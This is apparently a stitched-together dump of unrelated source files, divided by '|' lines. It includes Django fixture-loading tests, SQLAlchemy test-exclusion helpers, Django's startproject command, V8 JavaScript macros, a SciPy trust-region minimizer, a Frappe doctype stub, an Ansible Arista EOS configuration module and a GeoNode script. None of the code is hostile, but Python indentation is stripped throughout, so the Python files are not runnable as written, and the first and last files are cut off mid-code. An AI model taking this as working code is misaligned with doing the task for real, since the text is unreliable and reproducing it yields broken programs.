# MySQL needs a little prodding to reject invalid data.
# This won't affect other tests because the database connection
# is closed at the end of each test.
if connection.vendor == 'mysql':
connection.cursor().execute("SET sql_mode = 'TRADITIONAL'")
with self.assertRaises(IntegrityError) as cm:
management.call_command('loaddata', 'invalid.json', verbosity=0)
self.assertIn("Could not load fixtures.Article(pk=1):", cm.exception.args[0])
def test_loaddata_app_option(self):
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_1' found."):
management.call_command('loaddata', 'db_fixture_1', verbosity=0, app_label="someotherapp")
self.assertQuerysetEqual(Article.objects.all(), [])
management.call_command('loaddata', 'db_fixture_1', verbosity=0, app_label="fixtures")
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
])
def test_loaddata_verbosity_three(self):
output = StringIO()
management.call_command('loaddata', 'fixture1.json', verbosity=3, stdout=output, stderr=output)
command_output = output.getvalue()
self.assertIn(
"\rProcessed 1 object(s).\rProcessed 2 object(s)."
"\rProcessed 3 object(s).\rProcessed 4 object(s).\n",
command_output
)
def test_loading_using(self):
# Load db fixtures 1 and 2. These will load using the 'default' database identifier explicitly
management.call_command('loaddata', 'db_fixture_1', verbosity=0, using='default')
management.call_command('loaddata', 'db_fixture_2', verbosity=0, using='default')
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
'<Article: Who needs to use compressed data?>',
])
def test_unmatched_identifier_loading(self):
# Try to load db fixture 3. This won't load because the database identifier doesn't match
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_3' found."):
management.call_command('loaddata', 'db_fixture_3', verbosity=0)
with self.assertRaisesMessage(CommandError, "No fixture named 'db_fixture_3' found."):
management.call_command('loaddata', 'db_fixture_3', verbosity=0, using='default')
self.assertQuerysetEqual(Article.objects.all(), [])
def test_output_formats(self):
# Load back in fixture 1, we need the articles from it
management.call_command('loaddata', 'fixture1', verbosity=0)
# Try to load fixture 6 using format discovery
management.call_command('loaddata', 'fixture6', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Time to reform copyright> tagged "copyright">',
'<Tag: <Article: Time to reform copyright> tagged "law">'
], ordered=False)
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}, {"pk": 1, "model": '
'"fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": "copyright", "tagged_id": '
'3}}, {"pk": 2, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": '
'"law", "tagged_id": 3}}, {"pk": 1, "model": "fixtures.person", "fields": {"name": "Django '
'Reinhardt"}}, {"pk": 2, "model": "fixtures.person", "fields": {"name": "Stephane Grappelli"}}, '
'{"pk": 3, "model": "fixtures.person", "fields": {"name": "Prince"}}]',
natural_foreign_keys=True
)
# Dump the current contents of the database as an XML fixture
self._dumpdata_assert(
['fixtures'],
'<?xml version="1.0" encoding="utf-8"?><django-objects version="1.0"><object pk="1" '
'model="fixtures.category"><field type="CharField" name="title">News Stories</field><field '
'type="TextField" name="description">Latest news stories</field></object><object pk="2" '
'model="fixtures.article"><field type="CharField" name="headline">Poker has no place on ESPN</field>'
'<field type="DateTimeField" name="pub_date">2006-06-16T12:00:00</field></object><object pk="3" '
'model="fixtures.article"><field type="CharField" name="headline">Time to reform copyright</field>'
'<field type="DateTimeField" name="pub_date">2006-06-16T13:00:00</field></object><object pk="1" '
'model="fixtures.tag"><field type="CharField" name="name">copyright</field><field '
'to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural>'
'<natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3</field>'
'</object><object pk="2" model="fixtures.tag"><field type="CharField" name="name">law</field><field '
'to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural>'
'<natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3</field>'
'</object><object pk="1" model="fixtures.person"><field type="CharField" name="name">Django Reinhardt'
'</field></object><object pk="2" model="fixtures.person"><field type="CharField" name="name">Stephane '
'Grappelli</field></object><object pk="3" model="fixtures.person"><field type="CharField" name="name">'
'Prince</field></object></django-objects>',
format='xml', natural_foreign_keys=True
)
def test_loading_with_exclude_app(self):
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1', exclude=['fixtures'], verbosity=0)
self.assertFalse(Article.objects.exists())
self.assertFalse(Category.objects.exists())
self.assertQuerysetEqual(Site.objects.all(), ['<Site: example.com>'])
def test_loading_with_exclude_model(self):
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1', exclude=['fixtures.Article'], verbosity=0)
self.assertFalse(Article.objects.exists())
self.assertQuerysetEqual(Category.objects.all(), ['<Category: News Stories>'])
self.assertQuerysetEqual(Site.objects.all(), ['<Site: example.com>'])
def test_exclude_option_errors(self):
"""Excluding a bogus app or model should raise an error."""
msg = "No installed app with label 'foo_app'."
with self.assertRaisesMessage(management.CommandError, msg):
management.call_command('loaddata', 'fixture1', exclude=['foo_app'], verbosity=0)
msg = "Unknown model: fixtures.FooModel"
with self.assertRaisesMessage(management.CommandError, msg):
management.call_command('loaddata', 'fixture1', exclude=['fixtures.FooModel'], verbosity=0)
class NonexistentFixtureTests(TestCase):
"""
Custom class to limit fixture dirs.
"""
def test_loaddata_not_existent_fixture_file(self):
stdout_output = StringIO()
with self.assertRaisesMessage(CommandError, "No fixture named 'this_fixture_doesnt_exist' found."):
management.call_command('loaddata', 'this_fixture_doesnt_exist', stdout=stdout_output)
@mock.patch('django.db.connection.enable_constraint_checking')
@mock.patch('django.db.connection.disable_constraint_checking')
def test_nonexistent_fixture_no_constraint_checking(
self, disable_constraint_checking, enable_constraint_checking):
"""
If no fixtures match the loaddata command, constraints checks on the
database shouldn't be disabled. This is performance critical on MSSQL.
"""
with self.assertRaisesMessage(CommandError, "No fixture named 'this_fixture_doesnt_exist' found."):
management.call_command('loaddata', 'this_fixture_doesnt_exist', verbosity=0)
disable_constraint_checking.assert_not_called()
enable_constraint_checking.assert_not_called()
class FixtureTransactionTests(DumpDataAssertMixin, TransactionTestCase):
available_apps = [
'fixtures',
'django.contrib.sites',
]
@skipUnlessDBFeature('supports_forward_references')
def test_format_discovery(self):
# Load fixture 1 again, using format discovery
management.call_command('loaddata', 'fixture1', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Try to load fixture 2 using format discovery; this will fail
# because there are two fixture2's in the fixtures directory
with self.assertRaises(management.CommandError) as cm:
management.call_command('loaddata', 'fixture2', verbosity=0)
self.assertIn("Multiple fixtures named 'fixture2'", cm.exception.args[0])
# object list is unaffected
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Load fixture 4 (compressed), using format discovery
management.call_command('loaddata', 'fixture4', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django pets kitten>',
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
|
import operator
from ..util import decorator
from . import config
from .. import util
import inspect
import contextlib
from sqlalchemy.util.compat import inspect_getargspec
def skip_if(predicate, reason=None):
rule = compound()
pred = _as_predicate(predicate, reason)
rule.skips.add(pred)
return rule
def fails_if(predicate, reason=None):
rule = compound()
pred = _as_predicate(predicate, reason)
rule.fails.add(pred)
return rule
class compound(object):
def __init__(self):
self.fails = set()
self.skips = set()
self.tags = set()
def __add__(self, other):
return self.add(other)
def add(self, *others):
copy = compound()
copy.fails.update(self.fails)
copy.skips.update(self.skips)
copy.tags.update(self.tags)
for other in others:
copy.fails.update(other.fails)
copy.skips.update(other.skips)
copy.tags.update(other.tags)
return copy
def not_(self):
copy = compound()
copy.fails.update(NotPredicate(fail) for fail in self.fails)
copy.skips.update(NotPredicate(skip) for skip in self.skips)
copy.tags.update(self.tags)
return copy
@property
def enabled(self):
return self.enabled_for_config(config._current)
def enabled_for_config(self, config):
for predicate in self.skips.union(self.fails):
if predicate(config):
return False
else:
return True
def matching_config_reasons(self, config):
return [
predicate._as_string(config) for predicate
in self.skips.union(self.fails)
if predicate(config)
]
def include_test(self, include_tags, exclude_tags):
return bool(
not self.tags.intersection(exclude_tags) and
(not include_tags or self.tags.intersection(include_tags))
)
def _extend(self, other):
self.skips.update(other.skips)
self.fails.update(other.fails)
self.tags.update(other.tags)
def __call__(self, fn):
if hasattr(fn, '_sa_exclusion_extend'):
fn._sa_exclusion_extend._extend(self)
return fn
@decorator
def decorate(fn, *args, **kw):
return self._do(config._current, fn, *args, **kw)
decorated = decorate(fn)
decorated._sa_exclusion_extend = self
return decorated
@contextlib.contextmanager
def fail_if(self):
all_fails = compound()
all_fails.fails.update(self.skips.union(self.fails))
try:
yield
except Exception as ex:
all_fails._expect_failure(config._current, ex)
else:
all_fails._expect_success(config._current)
def _do(self, cfg, fn, *args, **kw):
for skip in self.skips:
if skip(cfg):
msg = "'%s' : %s" % (
fn.__name__,
skip._as_string(cfg)
)
config.skip_test(msg)
try:
return_value = fn(*args, **kw)
except Exception as ex:
self._expect_failure(cfg, ex, name=fn.__name__)
else:
self._expect_success(cfg, name=fn.__name__)
return return_value
def _expect_failure(self, config, ex, name='block'):
for fail in self.fails:
if fail(config):
print(("%s failed as expected (%s): %s " % (
name, fail._as_string(config), str(ex))))
break
else:
util.raise_from_cause(ex)
def _expect_success(self, config, name='block'):
if not self.fails:
return
for fail in self.fails:
if not fail(config):
break
else:
raise AssertionError(
"Unexpected success for '%s' (%s)" %
(
name,
" and ".join(
fail._as_string(config)
for fail in self.fails
)
)
)
def requires_tag(tagname):
return tags([tagname])
def tags(tagnames):
comp = compound()
comp.tags.update(tagnames)
return comp
def only_if(predicate, reason=None):
predicate = _as_predicate(predicate)
return skip_if(NotPredicate(predicate), reason)
def succeeds_if(predicate, reason=None):
predicate = _as_predicate(predicate)
return fails_if(NotPredicate(predicate), reason)
class Predicate(object):
@classmethod
def as_predicate(cls, predicate, description=None):
if isinstance(predicate, compound):
return cls.as_predicate(predicate.enabled_for_config, description)
elif isinstance(predicate, Predicate):
if description and predicate.description is None:
predicate.description = description
return predicate
elif isinstance(predicate, (list, set)):
return OrPredicate(
[cls.as_predicate(pred) for pred in predicate],
description)
elif isinstance(predicate, tuple):
return SpecPredicate(*predicate)
elif isinstance(predicate, util.string_types):
tokens = predicate.split(" ", 2)
op = spec = None
db = tokens.pop(0)
if tokens:
op = tokens.pop(0)
if tokens:
spec = tuple(int(d) for d in tokens.pop(0).split("."))
return SpecPredicate(db, op, spec, description=description)
elif util.callable(predicate):
return LambdaPredicate(predicate, description)
else:
assert False, "unknown predicate type: %s" % predicate
def _format_description(self, config, negate=False):
bool_ = self(config)
if negate:
bool_ = not negate
return self.description % {
"driver": config.db.url.get_driver_name()
if config else "<no driver>",
"database": config.db.url.get_backend_name()
if config else "<no database>",
"doesnt_support": "doesn't support" if bool_ else "does support",
"does_support": "does support" if bool_ else "doesn't support"
}
def _as_string(self, config=None, negate=False):
raise NotImplementedError()
class BooleanPredicate(Predicate):
def __init__(self, value, description=None):
self.value = value
self.description = description or "boolean %s" % value
def __call__(self, config):
return self.value
def _as_string(self, config, negate=False):
return self._format_description(config, negate=negate)
class SpecPredicate(Predicate):
def __init__(self, db, op=None, spec=None, description=None):
self.db = db
self.op = op
self.spec = spec
self.description = description
_ops = {
'<': operator.lt,
'>': operator.gt,
'==': operator.eq,
'!=': operator.ne,
'<=': operator.le,
'>=': operator.ge,
'in': operator.contains,
'between': lambda val, pair: val >= pair[0] and val <= pair[1],
}
def __call__(self, config):
engine = config.db
if "+" in self.db:
dialect, driver = self.db.split('+')
else:
dialect, driver = self.db, None
if dialect and engine.name != dialect:
return False
if driver is not None and engine.driver != driver:
return False
if self.op is not None:
assert driver is None, "DBAPI version specs not supported yet"
version = _server_version(engine)
oper = hasattr(self.op, '__call__') and self.op \
or self._ops[self.op]
return oper(version, self.spec)
else:
return True
def _as_string(self, config, negate=False):
if self.description is not None:
return self._format_description(config)
elif self.op is None:
if negate:
return "not %s" % self.db
else:
return "%s" % self.db
else:
if negate:
return "not %s %s %s" % (
self.db,
self.op,
self.spec
)
else:
return "%s %s %s" % (
self.db,
self.op,
self.spec
)
class LambdaPredicate(Predicate):
def __init__(self, lambda_, description=None, args=None, kw=None):
spec = inspect_getargspec(lambda_)
if not spec[0]:
self.lambda_ = lambda db: lambda_()
else:
self.lambda_ = lambda_
self.args = args or ()
self.kw = kw or {}
if description:
self.description = description
elif lambda_.__doc__:
self.description = lambda_.__doc__
else:
self.description = "custom function"
def __call__(self, config):
return self.lambda_(config)
def _as_string(self, config, negate=False):
return self._format_description(config)
class NotPredicate(Predicate):
def __init__(self, predicate, description=None):
self.predicate = predicate
self.description = description
def __call__(self, config):
return not self.predicate(config)
def _as_string(self, config, negate=False):
if self.description:
return self._format_description(config, not negate)
else:
return self.predicate._as_string(config, not negate)
class OrPredicate(Predicate):
def __init__(self, predicates, description=None):
self.predicates = predicates
self.description = description
def __call__(self, config):
for pred in self.predicates:
if pred(config):
return True
return False
def _eval_str(self, config, negate=False):
if negate:
conjunction = " and "
else:
conjunction = " or "
return conjunction.join(p._as_string(config, negate=negate)
for p in self.predicates)
def _negation_str(self, config):
if self.description is not None:
return "Not " + self._format_description(config)
else:
return self._eval_str(config, negate=True)
def _as_string(self, config, negate=False):
if negate:
return self._negation_str(config)
else:
if self.description is not None:
return self._format_description(config)
else:
return self._eval_str(config)
_as_predicate = Predicate.as_predicate
def _is_excluded(db, op, spec):
return SpecPredicate(db, op, spec)(config._current)
def _server_version(engine):
"""Return a server_version_info tuple."""
# force metadata to be retrieved
conn = engine.connect()
version = getattr(engine.dialect, 'server_version_info', ())
conn.close()
return version
def db_spec(*dbs):
return OrPredicate(
[Predicate.as_predicate(db) for db in dbs]
)
def open():
return skip_if(BooleanPredicate(False, "mark as execute"))
def closed():
return skip_if(BooleanPredicate(True, "marked as skip"))
def fails(reason=None):
return fails_if(BooleanPredicate(True, reason or "expected to fail"))
@decorator
def future(fn, *arg):
return fails_if(LambdaPredicate(fn), "Future feature")
def fails_on(db, reason=None):
return fails_if(Predicate.as_predicate(db), reason)
def fails_on_everything_except(*dbs):
return succeeds_if(
OrPredicate([
Predicate.as_predicate(db) for db in dbs
])
)
def skip(db, reason=None):
return skip_if(Predicate.as_predicate(db), reason)
def only_on(dbs, reason=None):
return only_if(
OrPredicate([Predicate.as_predicate(db) for db in util.to_list(dbs)])
)
def exclude(db, op, spec, reason=None):
return skip_if(SpecPredicate(db, op, spec), reason)
def against(config, *queries):
assert queries, "no queries sent!"
return OrPredicate([
Predicate.as_predicate(query)
for query in queries
])(config)
|
from importlib import import_module
from django.core.management.base import CommandError
from django.core.management.templates import TemplateCommand
from ..utils import get_random_secret_key
class Command(TemplateCommand):
help = (
"Creates a Django project directory structure for the given project "
"name in the current directory or optionally in the given directory."
)
missing_args_message = "You must provide a project name."
def handle(self, **options):
project_name, target = options.pop('name'), options.pop('directory')
self.validate_name(project_name, "project")
# Check that the project_name cannot be imported.
try:
import_module(project_name)
except ImportError:
pass
else:
raise CommandError(
"%r conflicts with the name of an existing Python module and "
"cannot be used as a project name. Please try another name." % project_name
)
# Create a random SECRET_KEY to put it in the main settings.
options['secret_key'] = get_random_secret_key()
super().handle('project', project_name, target, **options)
|
import os
abspath = os.path.abspath(__file__)
os.chdir(os.path.dirname(abspath))
exec(compile(open("wpt", "r").read(), "wpt", 'exec'))
|
const NONE = 0;
const READ_ONLY = 1;
const DONT_ENUM = 2;
const DONT_DELETE = 4;
const GETTER = 0;
const SETTER = 1;
const kApiTagOffset = 0;
const kApiPropertyListOffset = 1;
const kApiSerialNumberOffset = 2;
const kApiConstructorOffset = 2;
const kApiPrototypeTemplateOffset = 5;
const kApiParentTemplateOffset = 6;
const kApiFlagOffset = 14;
const NO_HINT = 0;
const NUMBER_HINT = 1;
const STRING_HINT = 2;
const kFunctionTag = 0;
const kNewObjectTag = 1;
const HoursPerDay = 24;
const MinutesPerHour = 60;
const SecondsPerMinute = 60;
const msPerSecond = 1000;
const msPerMinute = 60000;
const msPerHour = 3600000;
const msPerDay = 86400000;
const msPerMonth = 2592000000;
const kUninitialized = -1;
const kReadOnlyPrototypeBit = 3; # For FunctionTemplateInfo, matches objects.h
const kInvalidDate = 'Invalid Date';
const kDayZeroInJulianDay = 2440588;
const kMonthMask = 0x1e0;
const kDayMask = 0x01f;
const kYearShift = 9;
const kMonthShift = 5;
const kMinYear = -1000000;
const kMaxYear = 1000000;
const kMinMonth = -10000000;
const kMaxMonth = 10000000;
const STRING_TO_REGEXP_CACHE_ID = 0;
macro IS_NULL(arg) = (arg === null);
macro IS_NULL_OR_UNDEFINED(arg) = (arg == null);
macro IS_UNDEFINED(arg) = (typeof(arg) === 'undefined');
macro IS_NUMBER(arg) = (typeof(arg) === 'number');
macro IS_STRING(arg) = (typeof(arg) === 'string');
macro IS_BOOLEAN(arg) = (typeof(arg) === 'boolean');
macro IS_OBJECT(arg) = (%_IsObject(arg));
macro IS_ARRAY(arg) = (%_IsArray(arg));
macro IS_FUNCTION(arg) = (%_IsFunction(arg));
macro IS_REGEXP(arg) = (%_IsRegExp(arg));
macro IS_SET(arg) = (%_ClassOf(arg) === 'Set');
macro IS_MAP(arg) = (%_ClassOf(arg) === 'Map');
macro IS_WEAKMAP(arg) = (%_ClassOf(arg) === 'WeakMap');
macro IS_DATE(arg) = (%_ClassOf(arg) === 'Date');
macro IS_NUMBER_WRAPPER(arg) = (%_ClassOf(arg) === 'Number');
macro IS_STRING_WRAPPER(arg) = (%_ClassOf(arg) === 'String');
macro IS_BOOLEAN_WRAPPER(arg) = (%_ClassOf(arg) === 'Boolean');
macro IS_ERROR(arg) = (%_ClassOf(arg) === 'Error');
macro IS_SCRIPT(arg) = (%_ClassOf(arg) === 'Script');
macro IS_ARGUMENTS(arg) = (%_ClassOf(arg) === 'Arguments');
macro IS_GLOBAL(arg) = (%_ClassOf(arg) === 'global');
macro IS_UNDETECTABLE(arg) = (%_IsUndetectableObject(arg));
macro FLOOR(arg) = $floor(arg);
macro IS_SPEC_OBJECT(arg) = (%_IsSpecObject(arg));
macro IS_SPEC_FUNCTION(arg) = (%_ClassOf(arg) === 'Function');
const kBoundFunctionIndex = 0;
const kBoundThisIndex = 1;
const kBoundArgumentsStartIndex = 2;
macro NUMBER_IS_NAN(arg) = (!%_IsSmi(%IS_VAR(arg)) && !(arg == arg));
macro NUMBER_IS_FINITE(arg) = (%_IsSmi(%IS_VAR(arg)) || ((arg == arg) && (arg != 1/0) && (arg != -1/0)));
macro TO_INTEGER(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : %NumberToInteger(ToNumber(arg)));
macro TO_INTEGER_MAP_MINUS_ZERO(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : %NumberToIntegerMapMinusZero(ToNumber(arg)));
macro TO_INT32(arg) = (%_IsSmi(%IS_VAR(arg)) ? arg : (arg >> 0));
macro TO_UINT32(arg) = (arg >>> 0);
macro TO_STRING_INLINE(arg) = (IS_STRING(%IS_VAR(arg)) ? arg : NonStringToString(arg));
macro TO_NUMBER_INLINE(arg) = (IS_NUMBER(%IS_VAR(arg)) ? arg : NonNumberToNumber(arg));
macro TO_OBJECT_INLINE(arg) = (IS_SPEC_OBJECT(%IS_VAR(arg)) ? arg : ToObject(arg));
macro JSON_NUMBER_TO_STRING(arg) = ((%_IsSmi(%IS_VAR(arg)) || arg - arg == 0) ? %_NumberToString(arg) : "null");
python macro CHAR_CODE(str) = ord(str[1]);
const REGEXP_NUMBER_OF_CAPTURES = 0;
const REGEXP_FIRST_CAPTURE = 3;
macro NUMBER_OF_CAPTURES(array) = ((array)[0]);
const MAX_TIME_MS = 8640000000000000;
const MAX_TIME_BEFORE_UTC = 8640002592000000;
macro CHECK_DATE(arg) = if (%_ClassOf(arg) !== 'Date') ThrowDateTypeError();
macro LOCAL_DATE_VALUE(arg) = (%_DateField(arg, 0) + %_DateField(arg, 21));
macro UTC_DATE_VALUE(arg) = (%_DateField(arg, 0));
macro LOCAL_YEAR(arg) = (%_DateField(arg, 1));
macro LOCAL_MONTH(arg) = (%_DateField(arg, 2));
macro LOCAL_DAY(arg) = (%_DateField(arg, 3));
macro LOCAL_WEEKDAY(arg) = (%_DateField(arg, 4));
macro LOCAL_HOUR(arg) = (%_DateField(arg, 5));
macro LOCAL_MIN(arg) = (%_DateField(arg, 6));
macro LOCAL_SEC(arg) = (%_DateField(arg, 7));
macro LOCAL_MS(arg) = (%_DateField(arg, 8));
macro LOCAL_DAYS(arg) = (%_DateField(arg, 9));
macro LOCAL_TIME_IN_DAY(arg) = (%_DateField(arg, 10));
macro UTC_YEAR(arg) = (%_DateField(arg, 11));
macro UTC_MONTH(arg) = (%_DateField(arg, 12));
macro UTC_DAY(arg) = (%_DateField(arg, 13));
macro UTC_WEEKDAY(arg) = (%_DateField(arg, 14));
macro UTC_HOUR(arg) = (%_DateField(arg, 15));
macro UTC_MIN(arg) = (%_DateField(arg, 16));
macro UTC_SEC(arg) = (%_DateField(arg, 17));
macro UTC_MS(arg) = (%_DateField(arg, 18));
macro UTC_DAYS(arg) = (%_DateField(arg, 19));
macro UTC_TIME_IN_DAY(arg) = (%_DateField(arg, 20));
macro TIMEZONE_OFFSET(arg) = (%_DateField(arg, 21));
macro SET_UTC_DATE_VALUE(arg, value) = (%DateSetValue(arg, value, 1));
macro SET_LOCAL_DATE_VALUE(arg, value) = (%DateSetValue(arg, value, 0));
const LAST_SUBJECT_INDEX = 1;
macro LAST_SUBJECT(array) = ((array)[1]);
macro LAST_INPUT(array) = ((array)[2]);
macro CAPTURE(index) = (3 + (index));
const CAPTURE0 = 3;
const CAPTURE1 = 4;
macro OVERRIDE_MATCH(override) = ((override)[0]);
macro OVERRIDE_POS(override) = ((override)[(override).length - 2]);
macro OVERRIDE_SUBJECT(override) = ((override)[(override).length - 1]);
macro OVERRIDE_CAPTURE(override, index) = ((override)[(index)]);
const IS_ACCESSOR_INDEX = 0;
const VALUE_INDEX = 1;
const GETTER_INDEX = 2;
const SETTER_INDEX = 3;
const WRITABLE_INDEX = 4;
const ENUMERABLE_INDEX = 5;
const CONFIGURABLE_INDEX = 6;
const TYPE_NATIVE = 0;
const TYPE_EXTENSION = 1;
const TYPE_NORMAL = 2;
const COMPILATION_TYPE_HOST = 0;
const COMPILATION_TYPE_EVAL = 1;
const COMPILATION_TYPE_JSON = 2;
const kNoLineNumberInfo = 0;
|
from ._trustregion import (_minimize_trust_region)
from ._trlib import (get_trlib_quadratic_subproblem)
__all__ = ['_minimize_trust_krylov']
def _minimize_trust_krylov(fun, x0, args=(), jac=None, hess=None, hessp=None,
inexact=True, **trust_region_options):
"""
Minimization of a scalar function of one or more variables using
a nearly exact trust-region algorithm that only requires matrix
vector products with the hessian matrix.
.. versionadded:: 1.0.0
Options
-------
inexact : bool, optional
Accuracy to solve subproblems. If True requires less nonlinear
iterations, but more vector products.
"""
if jac is None:
raise ValueError('Jacobian is required for trust region ',
'exact minimization.')
if hess is None and hessp is None:
raise ValueError('Either the Hessian or the Hessian-vector product '
'is required for Krylov trust-region minimization')
# tol_rel specifies the termination tolerance relative to the initial
# gradient norm in the Krylov subspace iteration.
# - tol_rel_i specifies the tolerance for interior convergence.
# - tol_rel_b specifies the tolerance for boundary convergence.
# in nonlinear programming applications it is not necessary to solve
# the boundary case as exact as the interior case.
# - setting tol_rel_i=-2 leads to a forcing sequence in the Krylov
# subspace iteration leading to quadratic convergence if eventually
# the trust region stays inactive.
# - setting tol_rel_b=-3 leads to a forcing sequence in the Krylov
# subspace iteration leading to superlinear convergence as long
# as the iterates hit the trust region boundary.
# For details consult the documentation of trlib_krylov_min
# in _trlib/trlib_krylov.h
#
# Optimality of this choice of parameters among a range of possibilities
# has been tested on the unconstrained subset of the CUTEst library.
if inexact:
return _minimize_trust_region(fun, x0, args=args, jac=jac,
hess=hess, hessp=hessp,
subproblem=get_trlib_quadratic_subproblem(
tol_rel_i=-2.0, tol_rel_b=-3.0,
disp=trust_region_options.get('disp', False)
),
**trust_region_options)
else:
return _minimize_trust_region(fun, x0, args=args, jac=jac,
hess=hess, hessp=hessp,
subproblem=get_trlib_quadratic_subproblem(
tol_rel_i=1e-8, tol_rel_b=1e-6,
disp=trust_region_options.get('disp', False)
),
**trust_region_options)
|
from __future__ import unicode_literals
from frappe.model.document import Document
class DosageStrength(Document):
pass
|
DOCUMENTATION = """
---
module: eos_template
version_added: "2.1"
author: "Peter sprygada (@privateip)"
short_description: Manage Arista EOS device configurations
description:
- Manages network device configurations over SSH or eAPI. This module
allows implementors to work with the device running-config. It
provides a way to push a set of commands onto a network device
by evaluting the current running-config and only pushing configuration
commands that are not already configured. The config source can
be a set of commands or a template.
extends_documentation_fragment: eos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
file in role or playbook root folder in templates directory.
required: true
force:
description:
- The force argument instructs the module to not consider the
current devices running-config. When set to true, this will
cause the module to push the contents of I(src) into the device
without first checking if already configured.
required: false
default: false
choices: ['yes', 'no']
include_defaults:
description:
- By default when the M(eos_template) connects to the remote
device to retrieve the configuration it will issue the `show
running-config` command. If this option is set to True then
the issued command will be `show running-config all`
required: false
default: false
choices: ['yes', 'no']
backup:
description:
- When this argument is configured true, the module will backup
the running-config from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: ['yes', 'no']
replace:
description:
- This argument will cause the provided configuration to be replaced
on the destination node. The use of the replace argument will
always cause the task to set changed to true and will implies
I(force) is true. This argument is only valid with I(transport)
is eapi.
required: false
default: false
choices: ['yes', 'no']
config:
description:
- The module, by default, will connect to the remote device and
retrieve the current running-config to use as a base for comparing
against the contents of source. There are times when it is not
desirable to have the task get the current running-config for
every task in a playbook. The I(config) argument allows the
implementer to pass in the configuruation to use as the base
config for comparision.
required: false
default: null
"""
EXAMPLES = """
- name: push a configuration onto the device
eos_template:
src: config.j2
- name: forceable push a configuration onto the device
eos_template:
src: config.j2
force: yes
- name: provide the base configuration for comparision
eos_template:
src: candidate_config.txt
config: current_config.txt
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: always
type: list
sample: ['...', '...']
responses:
description: The set of responses from issuing the commands on the device
retured: when not check_mode
type: list
sample: ['...', '...']
"""
import re
def get_config(module):
config = module.params.get('config')
if not config and not module.params['force']:
config = module.config
return config
def filter_exit(commands):
# Filter out configuration mode commands followed immediately by an
# exit command indented by one level only, e.g.
# - route-map map01 permit 10
# - exit
#
# Build a temporary list as we filter, then copy the temp list
# back onto the commands list.
temp = []
ind_prev = 999
count = 0
for c in commands:
ind_this = c.count(' ')
if re.search(r"^\s*exit$", c) and ind_this == ind_prev + 1:
temp.pop()
count -= 1
if count != 0:
ind_prev = temp[-1].count(' ')
continue
temp.append(c)
ind_prev = ind_this
count += 1
return temp
def main():
""" main entry point for module execution
"""
argument_spec = dict(
src=dict(required=True),
force=dict(default=False, type='bool'),
include_defaults=dict(default=False, type='bool'),
backup=dict(default=False, type='bool'),
replace=dict(default=False, type='bool'),
config=dict()
)
mutually_exclusive = [('config', 'backup'), ('config', 'force')]
module = get_module(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
replace = module.params['replace']
commands = list()
running = None
result = dict(changed=False)
candidate = NetworkConfig(contents=module.params['src'], indent=3)
if replace:
if module.params['transport'] == 'cli':
module.fail_json(msg='config replace is only supported over eapi')
commands = str(candidate).split('\n')
else:
contents = get_config(module)
if contents:
running = NetworkConfig(contents=contents, indent=3)
result['_backup'] = contents
if not module.params['force']:
commands = candidate.difference((running or list()))
else:
commands = str(candidate).split('\n')
if commands:
commands = filter_exit(commands)
if not module.check_mode:
commands = [str(c).strip() for c in commands]
response = module.configure(commands, replace=replace)
result['responses'] = response
result['changed'] = True
result['updates'] = commands
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.eos import *
if __name__ == '__main__':
main()
|
import sys
import os
geonode_path = os.path.abspath(os.path.join(os.path.dirname(os.path.dirname(__file__)), '../geonode'))
sys.path.append(geonode_path)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import glob
from random import randint
from timeit import Timer
from django.core.files import File
from django.conf import settings
from taggit.models import Tag
from geonode.base.models import TopicCategory
from geonode.base.models import Region
from geonode.people.models import Profile
from geonode.documents.models import Document
from geonode.layers.models import Layer
from geonode.layers.utils import file_upload
from geonode.tasks.deletion import delete_layer
def get_random_user():
""" Get a random user """
users_count = Profile.objects.all().count()
random_index = randint(0, users_count -1)
return Profile.objects.all()[random_index]
def assign_random_category(resource):
""" Assign a random category to a resource """
random_index = randint(0, TopicCategory.objects.all().count() - 1)
